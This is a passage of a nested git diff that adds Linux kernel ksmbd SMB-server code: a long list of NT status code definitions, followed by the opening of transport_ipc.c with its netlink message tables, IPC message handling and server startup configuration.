++#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS \
++	cpu_to_le32(0xC01E051C)
++#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
++#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS \
++	cpu_to_le32(0xC01E051F)
++#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
++#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST	\
++	cpu_to_le32(0xC01E0521)
++#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
++#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
++#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
++#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
++#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
++#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
++#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
++	cpu_to_le32(0xC01E0506)
++#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
++	cpu_to_le32(0xC01E0507)
++#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED	\
++	cpu_to_le32(0xC01E0508)
++#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
++#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
++#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
++#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
++	cpu_to_le32(0xC01E050D)
++#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
++#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
++#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
++#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
++#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA	\
++	cpu_to_le32(0xC01E0515)
++#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
++#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
++#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE	\
++	cpu_to_le32(0xC01E0518)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS	\
++	cpu_to_le32(0xC01E051A)
++#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS	\
++	cpu_to_le32(0xC01E051B)
++#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
++#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
++#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
++#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
++#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
++#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
++#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE \
++	cpu_to_le32(0xC01E0586)
++#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING	\
++	cpu_to_le32(0xC01E0587)
++#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
++#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
++#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
++#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
++#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
++	cpu_to_le32(0xC01E05E1)
++#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
++	cpu_to_le32(0xC01E05E2)
++#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
++#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
++#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
++	cpu_to_le32(0xC01E05E5)
++#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
++#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
++#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
++#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
++#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
++#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
++#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
++#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
++#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
++#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
++#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
++#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
++#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
++#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
++#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
++#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
++#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
++#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
++#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
++#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
++#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
++#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
++#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
++#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
++#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
++#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
++#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
++#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
++#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
++#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
++#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
++#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
++#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
++#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
++#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
++#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
++#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
++#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
++#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
++#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
++#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
++#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
++#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
++#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
++#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
++#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
++#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
++#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
++#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
++#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
++#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
++#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
++#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
++#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
++#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
++#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
++#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
++#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
++#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
++#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
++#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
++#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
++#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
++#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
++#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
++#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
++#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
++#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
++#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
++#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
++#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
++#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
++#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
++#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
++#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
++#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
++#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
++#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
++#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
++#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
++#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
++#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
++#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
++#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
++#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
++#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
++#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
++#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
++#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
++#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
++#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
++#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
++#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
++#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
++#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
++#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
++#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
++#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
++#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
++#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
++#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
++#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
++#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
++#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
++#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
++#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
++#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
++#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
++#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
++#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
++#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
++#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
++#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
++#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
++#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
++#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
++#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
++#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
++#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
++#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
++#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
++#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
++#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
++#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
++#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
++#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
++#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
++#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
++#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
++#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
++#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
++#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
++#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
++#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
++#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
++#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
++#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
++
++#define STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP cpu_to_le32(0xC05D0000)
++#define STATUS_INVALID_LOCK_RANGE cpu_to_le32(0xC00001a1)
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+new file mode 100644
+index 0000000000000..40c721f9227e4
+--- /dev/null
++++ b/fs/smb/server/transport_ipc.c
+@@ -0,0 +1,884 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/jhash.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/mutex.h>
++#include <linux/wait.h>
++#include <linux/hashtable.h>
++#include <net/net_namespace.h>
++#include <net/genetlink.h>
++#include <linux/socket.h>
++#include <linux/workqueue.h>
++
++#include "vfs_cache.h"
++#include "transport_ipc.h"
++#include "server.h"
++#include "smb_common.h"
++
++#include "mgmt/user_config.h"
++#include "mgmt/share_config.h"
++#include "mgmt/user_session.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/ksmbd_ida.h"
++#include "connection.h"
++#include "transport_tcp.h"
++#include "transport_rdma.h"
++
++#define IPC_WAIT_TIMEOUT	(2 * HZ)
++
++#define IPC_MSG_HASH_BITS	3
++static DEFINE_HASHTABLE(ipc_msg_table, IPC_MSG_HASH_BITS);
++static DECLARE_RWSEM(ipc_msg_table_lock);
++static DEFINE_MUTEX(startup_lock);
++
++static DEFINE_IDA(ipc_ida);
++
++static unsigned int ksmbd_tools_pid;
++
++static bool ksmbd_ipc_validate_version(struct genl_info *m)
++{
++	if (m->genlhdr->version != KSMBD_GENL_VERSION) {
++		pr_err("%s. ksmbd: %d, kernel module: %d. %s.\n",
++		       "Daemon and kernel module version mismatch",
++		       m->genlhdr->version,
++		       KSMBD_GENL_VERSION,
++		       "User-space ksmbd should terminate");
++		return false;
++	}
++	return true;
++}
++
++struct ksmbd_ipc_msg {
++	unsigned int		type;
++	unsigned int		sz;
++	unsigned char		payload[];
++};
++
++struct ipc_msg_table_entry {
++	unsigned int		handle;
++	unsigned int		type;
++	wait_queue_head_t	wait;
++	struct hlist_node	ipc_table_hlist;
++
++	void			*response;
++};
++
++static struct delayed_work ipc_timer_work;
++
++static int handle_startup_event(struct sk_buff *skb, struct genl_info *info);
++static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info);
++static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
++static int ksmbd_ipc_heartbeat_request(void);
++
++static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
++	[KSMBD_EVENT_UNSPEC] = {
++		.len = 0,
++	},
++	[KSMBD_EVENT_HEARTBEAT_REQUEST] = {
++		.len = sizeof(struct ksmbd_heartbeat),
++	},
++	[KSMBD_EVENT_STARTING_UP] = {
++		.len = sizeof(struct ksmbd_startup_request),
++	},
++	[KSMBD_EVENT_SHUTTING_DOWN] = {
++		.len = sizeof(struct ksmbd_shutdown_request),
++	},
++	[KSMBD_EVENT_LOGIN_REQUEST] = {
++		.len = sizeof(struct ksmbd_login_request),
++	},
++	[KSMBD_EVENT_LOGIN_RESPONSE] = {
++		.len = sizeof(struct ksmbd_login_response),
++	},
++	[KSMBD_EVENT_SHARE_CONFIG_REQUEST] = {
++		.len = sizeof(struct ksmbd_share_config_request),
++	},
++	[KSMBD_EVENT_SHARE_CONFIG_RESPONSE] = {
++		.len = sizeof(struct ksmbd_share_config_response),
++	},
++	[KSMBD_EVENT_TREE_CONNECT_REQUEST] = {
++		.len = sizeof(struct ksmbd_tree_connect_request),
++	},
++	[KSMBD_EVENT_TREE_CONNECT_RESPONSE] = {
++		.len = sizeof(struct ksmbd_tree_connect_response),
++	},
++	[KSMBD_EVENT_TREE_DISCONNECT_REQUEST] = {
++		.len = sizeof(struct ksmbd_tree_disconnect_request),
++	},
++	[KSMBD_EVENT_LOGOUT_REQUEST] = {
++		.len = sizeof(struct ksmbd_logout_request),
++	},
++	[KSMBD_EVENT_RPC_REQUEST] = {
++	},
++	[KSMBD_EVENT_RPC_RESPONSE] = {
++	},
++	[KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST] = {
++	},
++	[KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE] = {
++	},
++};
++
++static struct genl_ops ksmbd_genl_ops[] = {
++	{
++		.cmd	= KSMBD_EVENT_UNSPEC,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_HEARTBEAT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_STARTING_UP,
++		.doit	= handle_startup_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHUTTING_DOWN,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGIN_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGIN_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHARE_CONFIG_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_CONNECT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_CONNECT_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_DISCONNECT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGOUT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_RPC_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_RPC_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++};
++
++static struct genl_family ksmbd_genl_family = {
++	.name		= KSMBD_GENL_NAME,
++	.version	= KSMBD_GENL_VERSION,
++	.hdrsize	= 0,
++	.maxattr	= KSMBD_EVENT_MAX,
++	.netnsok	= true,
++	.module		= THIS_MODULE,
++	.ops		= ksmbd_genl_ops,
++	.n_ops		= ARRAY_SIZE(ksmbd_genl_ops),
++	.resv_start_op	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE + 1,
++};
++
++static void ksmbd_nl_init_fixup(void)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(ksmbd_genl_ops); i++)
++		ksmbd_genl_ops[i].validate = GENL_DONT_VALIDATE_STRICT |
++						GENL_DONT_VALIDATE_DUMP;
++
++	ksmbd_genl_family.policy = ksmbd_nl_policy;
++}
++
++static int rpc_context_flags(struct ksmbd_session *sess)
++{
++	if (user_guest(sess->user))
++		return KSMBD_RPC_RESTRICTED_CONTEXT;
++	return 0;
++}
++
++static void ipc_update_last_active(void)
++{
++	if (server_conf.ipc_timeout)
++		server_conf.ipc_last_active = jiffies;
++}
++
++static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
++
++	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
++	if (msg)
++		msg->sz = sz;
++	return msg;
++}
++
++static void ipc_msg_free(struct ksmbd_ipc_msg *msg)
++{
++	kvfree(msg);
++}
++
++static void ipc_msg_handle_free(int handle)
++{
++	if (handle >= 0)
++		ksmbd_release_id(&ipc_ida, handle);
++}
++
++static int handle_response(int type, void *payload, size_t sz)
++{
++	unsigned int handle = *(unsigned int *)payload;
++	struct ipc_msg_table_entry *entry;
++	int ret = 0;
++
++	ipc_update_last_active();
++	down_read(&ipc_msg_table_lock);
++	hash_for_each_possible(ipc_msg_table, entry, ipc_table_hlist, handle) {
++		if (handle != entry->handle)
++			continue;
++
++		entry->response = NULL;
++		/*
++		 * Response message type value should be equal to
++		 * request message type + 1.
++		 */
++		if (entry->type + 1 != type) {
++			pr_err("Waiting for IPC type %d, got %d. Ignore.\n",
++			       entry->type + 1, type);
++		}
++
++		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++		if (!entry->response) {
++			ret = -ENOMEM;
++			break;
++		}
++
++		memcpy(entry->response, payload, sz);
++		wake_up_interruptible(&entry->wait);
++		ret = 0;
++		break;
++	}
++	up_read(&ipc_msg_table_lock);
++
++	return ret;
++}
++
++static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
++{
++	int ret;
++
++	ksmbd_set_fd_limit(req->file_max);
++	server_conf.flags = req->flags;
++	server_conf.signing = req->signing;
++	server_conf.tcp_port = req->tcp_port;
++	server_conf.ipc_timeout = req->ipc_timeout * HZ;
++	server_conf.deadtime = req->deadtime * SMB_ECHO_INTERVAL;
++	server_conf.share_fake_fscaps = req->share_fake_fscaps;
++	ksmbd_init_domain(req->sub_auth);
++
++	if (req->smb2_max_read)
++		init_smb2_max_read_size(req->smb2_max_read);
++	if (req->smb2_max_write)
++		init_smb2_max_write_size(req->smb2_max_write);
++	if (req->smb2_max_trans)
++		init_smb2_max_trans_size(req->smb2_max_trans);
++	if (req->smb2_max_credits)
++		init_smb2_max_credits(req->smb2_max_credits);
++	if (req->smbd_max_io_size)
++		init_smbd_max_io_size(req->smbd_max_io_size);
++
++	if (req->max_connections)
++		server_conf.max_connections = req->max_connections;
++
++	ret = ksmbd_set_netbios_name(req->netbios_name);
++	ret |= ksmbd_set_server_string(req->server_string);
++	ret |= ksmbd_set_work_group(req->work_group);
++	ret |= ksmbd_tcp_set_interfaces(KSMBD_STARTUP_CONFIG_INTERFACES(req),
++					req->ifc_list_sz);
++	if (ret) {
++		pr_err("Server configuration error: %s %s %s\n",
++		       req->netbios_name, req->server_string,
++		       req->work_group);
++		return ret;
++	}
++
++	if (req->min_prot[0]) {
++		ret = ksmbd_lookup_protocol_idx(req->min_prot);
++		if (ret >= 0)
++			server_conf.min_protocol = ret;
++	}
++	if (req->max_prot[0]) {
++		ret = ksmbd_lookup_protocol_idx(req->max_prot);
++		if (ret >= 0)
++			server_conf.max_protocol = ret;
++	}
++
++	if (server_conf.ipc_timeout)
++		schedule_delayed_work(&ipc_timer_work, server_conf.ipc_timeout);
++	return 0;
++}
++
++static int handle_startup_event(struct sk_buff *skb, struct genl_info *info)
++{
++	int ret = 0;
++
++#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
++	if (!netlink_capable(skb, CAP_NET_ADMIN))
++		return -EPERM;
++#endif
++
++	if (!ksmbd_ipc_validate_version(info))
++		return -EINVAL;
++
++	if (!info->attrs[KSMBD_EVENT_STARTING_UP])
++		return -EINVAL;
++
++	mutex_lock(&startup_lock);
++	if (!ksmbd_server_configurable()) {
++		mutex_unlock(&startup_lock);
++		pr_err("Server reset is in progress, can't start daemon\n");
